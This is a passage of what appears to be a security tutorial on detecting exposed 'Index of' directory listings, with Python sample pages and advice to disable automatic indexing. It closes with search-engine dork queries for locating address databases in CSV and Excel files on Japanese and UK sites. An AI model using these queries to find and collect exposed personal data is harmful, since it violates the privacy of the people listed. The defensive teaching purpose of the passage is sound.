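LISTING_PAGE = """<html><head><title>Index of /data</title></head><body>
<h1>Index of /data</h1>
<table><tr><th>Name</th><th>Last modified</th><th>Size</th><th>Description</th></tr>
<tr><td><a href="/">Parent Directory</a></td><td></td><td>-</td><td></td></tr>
<tr><td><a href="bbs.dat">bbs.dat</a></td><td>2008-02-01 10:00</td><td>12K</td><td></td></tr>
<tr><td><a href="address.csv">address.csv</a></td><td>2008-02-01 10:00</td><td>48K</td><td></td></tr>
<tr><td><a href="readme.html">readme.html</a></td><td>2008-02-01 10:00</td><td>2K</td><td></td></tr>
</table></body></html>"""

# Constructed sample: one of the slide's false positives, an ordinary page titled "Index of ...".
NORMAL_PAGE = """<html><head><title>Index of Native American Resources on the Internet</title></head>
<body><p>A curated index of library catalogues and other resources.</p>
<a href="catalogue.html">Catalogue</a></body></html>"""

if __name__ == "__main__":
    for page in (LISTING_PAGE, NORMAL_PAGE):
        verdict = analyse_listing(page)
        print(verdict, exposed_files(page))
```

Where a listing is confirmed on a production server, the usual remedy is to disable automatic indexes in the web server configuration (for Apache, Options -Indexes) rather than to rely on search engines not noticing.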
More on Google hacking
Example: searching for a database of people's addresses written in CSV, focusing on Japanese sites: filetype:csv address site:jp
Example: searching for a database of people's addresses written in Excel, focusing on UK sites: filetype:xls address site:uk